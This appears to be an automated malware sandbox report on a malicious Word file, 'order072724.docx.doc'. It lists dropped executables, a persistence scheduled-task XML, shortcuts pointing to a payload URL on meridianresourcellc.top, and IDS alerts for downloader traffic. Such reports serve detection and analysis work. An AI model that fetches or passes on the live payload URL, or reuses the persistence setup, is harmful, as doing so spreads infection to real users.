                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbM:IiiiiiiiiifdLloZQc8++lsJe1Mzdl/n
                                              MD5:4A4B94C9957F158CDD601AB4F1E16029
                                              SHA1:564EF0627AB54CE6D6BBF73F556F41258AA6235C
                                              SHA-256:D08805B4AE8B78BB7422E13BA07A591B250F4220456DA0FA819049E45A3B3B44
                                              SHA-512:326D98CAA18C011A92EC1CB8458A83B32F13874A2F04B431AD28D36EB55D8AF065618B5B3FB4F2BCE24BC462F8B735F35D7D0F7D6E9A48793BE74981C75C824B
                                              Malicious:false
                                              Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DFDAF9DF-6BC4-4F6A-A0FF-C33A9DF361BF}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):511450
                                              Entropy (8bit):3.621629728928142
                                              Encrypted:false
                                              SSDEEP:6144:RemBdeFemQZdeHemBde2em/deXemBdexemBdeMemBdememBdekemBde6emBdeqeS:k
                                              MD5:271957CE1E8C89ECC5B78817AFF72C3B
                                              SHA1:A09354D842AA8EB80F1809A4C0495A182D4299E0
                                              SHA-256:29909FE15CB930A5F538F574A6E37EE8D6B007B32861E2ED53CC8488084ACD93
                                              SHA-512:41DAD904919ACBE45028AC4EF5907AB2D37F0FFEDBB18771B9D11D7CEF320D06A008993B5C27CA816F49DE52A1B362B80AD66D75672155141787BD494F220EB6
                                              Malicious:false
                                              Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt........d........gd.

                                              C:\Users\user\AppData\Local\Temp\1zbxn4w1.5ag.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\3ak1eazt.2jo.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\ipm54scl.0fx.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\ob5jkauh.3vm.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\t3xzkerh.51d.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\tdci0il4.ovp.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\tmpD135.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.102475688478882
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTuv
                                              MD5:6D99E6CD844D5ADD3B984F1948DA2646
                                              SHA1:15CB9C373AAD15F533F1FCF1FD3EC21D0AB61AB7
                                              SHA-256:6FA1B2B733D08BD0EBCB9822B7FF5CE25DEB7EA6C2B4B1313C6586C66FBFE1B3
                                              SHA-512:239E5F54414E88DA4D0DA2A59FAE09BE18A211BE8A41904440B7D32ED40BC3BB6D0516D6E9C2EBEC2D4853474A313E70F5BB8B7217E6F22B2CF126F7A59D2BFD
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Local\Temp\tmpED3D.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.102475688478882
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTuv
                                              MD5:6D99E6CD844D5ADD3B984F1948DA2646
                                              SHA1:15CB9C373AAD15F533F1FCF1FD3EC21D0AB61AB7
                                              SHA-256:6FA1B2B733D08BD0EBCB9822B7FF5CE25DEB7EA6C2B4B1313C6586C66FBFE1B3
                                              SHA-512:239E5F54414E88DA4D0DA2A59FAE09BE18A211BE8A41904440B7D32ED40BC3BB6D0516D6E9C2EBEC2D4853474A313E70F5BB8B7217E6F22B2CF126F7A59D2BFD
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Local\Temp\wna1cdrj.utj.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\zanpl0wu.bwl.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\{4D4EF297-60A4-4F5E-91CE-187E9E616F6B}

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.0256201868743868
                                              Encrypted:false
                                              SSDEEP:6:I3DPcpvxggLRNpRuJcZksl3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPSB+c3TvYg3J/
                                              MD5:9BA6521AA4C293C42D4E2FEC0E7ACA22
                                              SHA1:158CD63044F9742D025F1FA28250EA84E7EED080
                                              SHA-256:36DECCAF1198C11A8573A9487781CC47666C8E48CB338168F2D520C5230104B5
                                              SHA-512:A95412771A17E29BE29A10FBECD277BEC8CADCCF2375786C53794EC1F40EDBC2AAF9DC0C4BA49FEBD2A5A77F4A8AA7A5F215C1C0D47DA3F19546EB12C68E12F2
                                              Malicious:false
                                              Preview:......M.eFy...z...eT.B...9E|..S,...X.F...Fa.q............................ZM..A..J.....$..........5....%I..(8n........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\{9AEEB410-4587-48E6-B580-60B91D50D143}

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.025564139045165832
                                              Encrypted:false
                                              SSDEEP:6:I3DPcjEHvxggLRxDsCY/l3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPLFIRvYg3J/
                                              MD5:1DC466685469840300A494CD367B51A9
                                              SHA1:06DA5DCF5D3C315B65A92225E651BD052D8B365A
                                              SHA-256:4F940B9345C1494059A19CACDAC806388BA1AB1D5A994ECE8D186EF7DF18BF51
                                              SHA-512:9BF965C1C403BC6BC384549A695633C70F576976608E7D808A50F64380A5C1A13E72AE9646E21A6979667737182D97577BD33218CF71F24D2F5C35DA5FB397C3
                                              Malicious:false
                                              Preview:......M.eFy...zu...p..M......V*S,...X.F...Fa.q............................&r....oI.....D6..........b.6...L.C.;J.i......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Generic INItialization configuration [folders]
                                              Category:dropped
                                              Size (bytes):116
                                              Entropy (8bit):4.595989056219899
                                              Encrypted:false
                                              SSDEEP:3:M1V7Jp2NBSm4uBMEHjGvRKVLX2NBSv:MBp2n7f6JOLX2nc
                                              MD5:24FECF80E8AA21D60A3E87434DDBBE1D
                                              SHA1:DE2DF2A8D8E2C5D14B293F1C96266075D5B94B9C
                                              SHA-256:D609E341B62603B5AE94B8B8EBAA4F9A76098B732396DE5F5DD5FC150B167BDD
                                              SHA-512:C8598EFD5F3414E3110FA5D8A62523A97AD0A72AAB574DFBA9298E55E9B8E8290023CDAC94C46A7ACB649A2E660A8DD8E702B7D3C58A4F5320A4AC46BF3960EB
                                              Malicious:false
                                              Preview:[doc]..swagodi.doc.url=0..order072724.docx.LNK=0..[folders]..meridianresourcellc.top.url=0..order072724.docx.LNK=0..

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\meridianresourcellc.top.url

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://meridianresourcellc.top/>), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):58
                                              Entropy (8bit):4.515044522508076
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQYm2fYFHjGvRKVKy:HRYFVm4Yh6JOD
                                              MD5:CE919771462756159C19EF008ADBA361
                                              SHA1:B4BF29478B73CF30DD7B82190ECE702B0194F0C5
                                              SHA-256:237781B51E25E5B3F2E561416E4862048EDC8B06E1D4498206D1B1849144D7C1
                                              SHA-512:7677002729140F68B375B2A90948CBBCA3A22D40B2AD1234A953E8A982B669B616E03031DB5D037F8ADC7EB1D55251BC28E82940B02902893F7939F9FDBF73DA
                                              Malicious:true
                                              Preview:[InternetShortcut]..URL=https://meridianresourcellc.top/..

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order072724.docx.LNK

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Fri Jul 26 20:45:00 2024, length=96005, window=hide
                                              Category:dropped
                                              Size (bytes):1044
                                              Entropy (8bit):4.537080470652056
                                              Encrypted:false
                                              SSDEEP:12:8RUUhgXg/XAlCPCHaXEqzBTytB/BGFX+WS/icWIYs3icvbDksPDtZ3YilMMEpxRI:8N/XTH1ytbkOcsyecsPDv3qaik7N
                                              MD5:D9110446B97182D6C8D373A8E6ABE302
                                              SHA1:7A2B11A85C68336819DD0402C6FA9EFDB663BCEF
                                              SHA-256:631C448C354541E5F72196B3835A300F73895C0BAA5B3915C3C873BB45CD5973
                                              SHA-512:1ACD3F7F018F538B4396A852486D68F91F8D1FE6B812F50AAF5BE9136D63EE3287F95E1F82CCB4ACF0E480EB5E610DBE248CEEDE3F8EEFCF8ADADB5C5D1B473E
                                              Malicious:false
                                              Preview:L..................F.... .......r.......r....P.......w...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X....user.8......QK.X.X..*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..w...X.. .ORDER0~1.DOC..V.......WE..WE.*.........................o.r.d.e.r.0.7.2.7.2.4...d.o.c.x...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\528110\Users.user\Desktop\order072724.docx.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r.0.7.2.7.2.4...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......528110..........D_....3N...W...9.W.e8..

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\swagodi.doc.url

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://meridianresourcellc.top/swagodi.doc>), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):69
                                              Entropy (8bit):4.626570204770473
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQYm2fYFHjGvRKVKNat:HRYFVm4Yh6JOUat
                                              MD5:4864A655882BCD4B9A581B677AFAA792
                                              SHA1:E18585174F42566473A25B467EBFC5A7E22255B1
                                              SHA-256:EDED0F94A9F63B3F7BCDE72C722DC338E4DE4E48C5E8BB972B3F5439510E0379
                                              SHA-512:3279A4A578FD476FF565351155F46E5F89BDF69B748C99DDBDA9E756F81CB08D0E3D27E04D2A7097EE04823F64AA706DB8B978944D5FAAAB9DF84A009AE4A4D3
                                              Malicious:true
                                              Preview:[InternetShortcut]..URL=https://meridianresourcellc.top/swagodi.doc..

                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview:..

                                              C:\Users\user\AppData\Roaming\gRpkBp.exe

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):683016
                                              Entropy (8bit):7.9744561964387195
                                              Encrypted:false
                                              SSDEEP:12288:HsTnHaxBnGvHnutIognoP+wRYnS0qYVd1XXikKRj9l/klFck1zJstnkR:WaznWHfYFYnK8PXikKRnCc2dN
                                              MD5:C448536AEEA36B80A15D639E31C7B847
                                              SHA1:5225387E8D149E14A73F3D25A055B069750AEFCC
                                              SHA-256:490784A930FE7D630C926436C540441694C905A9CB1FE6B3C25D16C366D75492
                                              SHA-512:E51B95996A95C7FC9AE4206A76642D8C4B59062BB49BC54931BDC1FDA8A080F5F29451E71A3F63F2C3530D8D71B56F9E00482D38A6C645492932986523576F01
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..f..............0..*..........VI... ...`....@.. ....................................@..................................I..O....`...............6...6.........../..T............................................ ............... ..H............text...\)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............4..............@..B................6I......H........B..D>.........................................................^..}.....(.......(.....*.0../........(...........s....o...........s.... ....o.....*..0............r...po......,..(...+...+....,....o.....+S.o............+7............(........( ..........,.........&........X.......i2...+..*......C.#f........{....*"..}....*....0..G.........(!.....,$........s".........%...P....(#...&+....-..+..($.....(%.....*..0..+.........,..{.......+....,...{....o&.......('....*..0......

                                              C:\Users\user\AppData\Roaming\swagodi78811.scr

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):683016
                                              Entropy (8bit):7.9744561964387195
                                              Encrypted:false
                                              SSDEEP:12288:HsTnHaxBnGvHnutIognoP+wRYnS0qYVd1XXikKRj9l/klFck1zJstnkR:WaznWHfYFYnK8PXikKRnCc2dN
                                              MD5:C448536AEEA36B80A15D639E31C7B847
                                              SHA1:5225387E8D149E14A73F3D25A055B069750AEFCC
                                              SHA-256:490784A930FE7D630C926436C540441694C905A9CB1FE6B3C25D16C366D75492
                                              SHA-512:E51B95996A95C7FC9AE4206A76642D8C4B59062BB49BC54931BDC1FDA8A080F5F29451E71A3F63F2C3530D8D71B56F9E00482D38A6C645492932986523576F01
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..f..............0..*..........VI... ...`....@.. ....................................@..................................I..O....`...............6...6.........../..T............................................ ............... ..H............text...\)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............4..............@..B................6I......H........B..D>.........................................................^..}.....(.......(.....*.0../........(...........s....o...........s.... ....o.....*..0............r...po......,..(...+...+....,....o.....+S.o............+7............(........( ..........,.........&........X.......i2...+..*......C.#f........{....*"..}....*....0..G.........(!.....,$........s".........%...P....(#...&+....-..+..($.....(%.....*..0..+.........,..{.......+....,...{....o&.......('....*..0......

                                              C:\Users\user\Desktop\~$der072724.docx.doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Microsoft Word 2007+
                                              Entropy (8bit):7.991473021388467
                                              TrID:
                                              • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                              • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                              • ZIP compressed archive (8000/1) 9.41%
                                              File name:order072724.docx.doc
                                              File size:96'005 bytes
                                              MD5:d89c00ac44e63c962db8c02cbf0bab93
                                              SHA1:2ac1b269e93b1a0c0068b68d8d1d4f9e4a5cc06a
                                              SHA256:5dc96311ffca3ae13e805020a61d276e2a2b1032e2ecc87a05f86c346e90d47c
                                              SHA512:088c3b2a514fb1e5c504b29eb86302b8e8787e26dc6f6b0ea13ad6916676f16dc2650aa9b2a571c48fe6628311bd25f4a509830fd718b6444dac82308402739c
                                              SSDEEP:1536:LMzw/hgP0QF6smQKEMzqsQtrm5rbXkvMtLQ6j7jfmMIGSzyn5ivkSVkkKLkJem5Y:o0Q8hjOXIrbXyMtE6j/EfvkS8LrQY
                                              TLSH:0793021159D92BEEC75E2875F1A1EF6DB2D68E9314731A08B070DE8E53348B3E712E18
                                              File Content Preview:PK...........X...7U... .......[Content_Types].xmlUT...8..f8..f8..f...n.0.E...............e.T.....U..<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y....Iy.\.P.........M..X...s.x/%.9T....s...R..i&...j......:x.O].=.p...Z8.....I........U....Z...........r..s....B

                                              File Icon

                                              Icon Hash:2764a3aaaeb7bdbf

                                              Static OLE Info

                                              General

                                              Document Type:OpenXML
                                              Number of OLE Files:1

                                              OLE File "order072724.docx.doc"

                                              Indicators
                                              Has Summary Info:
                                              Application Name:
                                              Encrypted Document:False
                                              Contains Word Document Stream:True
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:False

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                              2024-07-26T23:45:45.269177+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4918780192.168.2.22158.101.44.242
                                              2024-07-26T23:45:46.595188+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4919180192.168.2.22132.226.247.73
                                              2024-07-26T23:45:47.482045+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49193443192.168.2.22188.114.97.3
                                              2024-07-26T23:45:43.939318+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49186443192.168.2.22188.114.96.3
